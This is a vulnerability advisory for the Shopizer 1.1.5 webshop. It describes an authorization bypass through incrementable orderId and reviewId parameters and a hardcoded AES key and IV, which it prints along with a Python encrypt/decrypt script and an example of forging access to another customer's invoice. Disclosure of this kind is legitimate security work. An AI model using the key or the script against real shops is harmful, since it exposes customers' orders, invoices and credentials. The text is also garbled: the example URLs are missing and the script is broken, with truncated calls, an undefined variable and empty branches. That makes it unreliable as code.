Shopizer 1.1.5 Authorization Bypass / Hardcoded Key

Type packetstorm
Reporter Kestutis Gudinavicius
Modified 2014-07-11T00:00:00


                                            `SEC Consult Vulnerability Lab Security Advisory < 20140710-1 >  
title: Multiple high risk vulnerabilities in Shopizer webshop  
product: Shopizer  
vulnerable version: 1.1.5 and below  
fixed version: v2 (new codebase)  
impact: high  
found: 2012-09-04  
by: K. Gudinavicius  
SEC Consult Vulnerability Lab  
Vendor description:  
Shopizer is an open source java shopping cart and e-commerce content  
management software (CMS). The system is built on Struts 2, Hibernate and  
Spring. JQuery ui and ajax are heavily used on the ui as well as DWR and  
Struts2-jQuery plug-in. (  
Vulnerability overview/description:  
Shopizer is prone to the following high risk vulnerabilities:  
1) Authentication/authorization bypass  
The authentication and authorization mechanism provided by the web application  
is prone to an authentication/authorization bypass vulnerability, which can be  
easily exploited by remote attackers for gaining access to private  
information. Malicious actions can be performed by directly calling internal  
methods which are supposed to be accessed only by authenticated and permitted  
2) Hardcoded default encryption key  
A default encryption key is used across all versions of the Shopizer. It can't  
be changed, for example, by editing a configuration file, because it's  
hardcoded in the source code of the web application. The default encryption  
key can be used to encrypt special values allowing access to the sensitive  
Proof of concept:  
1) Authentication/authorization bypass  
The viewFiles method is vulnerable to authentication bypass. By changing the  
value of the orderId parameter (e.g. by incrementing it) it is possible to  
access and download ordered files of other users. This means that a malicious  
user can completely bypass the checkout process and even he doesn't need an  
account in order to gain access to the data that is sold on the target  
website. In the following example files of the order with the ID 61 will be  
The removeReview method is vulnerable to authorization bypass. An  
authenticated user can remove arbitrary product reviews by changing the value  
of the reviewId parameter (e.g. by incrementing it). The following URL will  
remove the product review with the ID 398.  
2) Hardcoded default encryption key  
The hardcoded default encryption key is 1000000000000000  
( and the default initialization vector is  
fedcba9876543210 ( Both values were extracted from the  
publicly available versions of the Shopizer. The following is the source code  
of a Python script that can be used to decrypt and encrypt arbitrary values by  
using the extracted keys.  
from Crypto.Cipher import AES  
from binascii import unhexlify  
import sys  
mode = AES.MODE_CBC  
size = AES.block_size  
pad = lambda s: s + (size - len(s) % size) * chr(size - len(s) % size)  
def decrypt(ciphertext):  
decryptor ='1000000000000000', mode,'fedcba9876543210')  
plain = decryptor.decrypt(ciphertext)  
print repr(plain)  
def encrypt(plaintext):  
encryptor ='1000000000000000', mode,'fedcba9876543210')  
plain = encryptor.encrypt(sample)  
print plain.encode('hex')  
if __name__=='__main__':  
if len(sys.argv)<3:  
print "Usage: %s encrypt|decrypt text" % sys.argv[0]  
elif sys.argv[1]=='decrypt':  
elif sys.argv[1]=='encrypt':  
The tool can be used to gain access to the invoices of other users. The  
prepareSimpleInvoice action takes encrypted value of the order number that is  
incremental. For example, to gain access to the invoice of the 57 order the  
57|0 string must be encrypted:  
C:\>python encrypt "57|0"  
The encrypted string is then used as a value for the fileId parameter of the  
following URL:  
Other parts of the web application such as passwords and ordered files also  
depend on the same encryption keys. If an attacker is able to gain access to  
the database where encrypted user credentials are stored, he can easily  
decrypt and use them in the further attacks.  
Vulnerable / tested versions:  
The vulnerabilities have been verified to exist in version 1.1.5 of Shopizer,  
which is the most recent version at the time of discovery.  
Vendor contact timeline:  
2012-01-10: The vulnerabilities have been found during a short blackbox test  
of a shopizer installation during a customer project  
2012-12-20: Customer allows contacting vendor  
2013-01-10: Contacting vendor through, fast reply,  
sending advisory  
2013-01-22: Asking for status update, reply: vendor takes a look  
2013-02-26: Asking for status update, vendor has some questions regarding  
version numbers  
2013-03-22: Asking for status update again  
2013-03-23: Vendor: Release 2 is scheduled for June  
2013-06-25: Asking for status update, no answer  
2013-07-01: Sending deadline for advisory release  
2013-07-07: Vendor: Version 2 of shopizer delayed  
2013-07-08: Asking for new release date  
2013-07-09: Vendor: moving from Struts to Spring & Spring security  
2013-10-03: Asking again for release date  
2013-10-06: Vendor: Release shortly  
2013-12-10: Asking for update  
2013-12-12: Vendor: Release date set for January 2014  
2014-06: Vendor releases v2  
2014-07-10: SEC Consult releases security advisory  
Using the old version branch 1.x is not recommended as there are no security  
fixes implemented by the vendor.  
Version 2 has been released by the vendor, but it has not been tested by SEC Consult  
and it is unclear whether the issues have been solved.  
Advisory URL:  
SEC Consult Vulnerability Lab  
SEC Consult  
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius  
Mooslackengasse 17, 1190 Vienna, Austria  
Phone: +43 1 8903043 0  
Fax: +43 1 8903043 15  
Mail: research at sec-consult dot com  
EOF K. Gudinavicius / @2012, 2013, 2014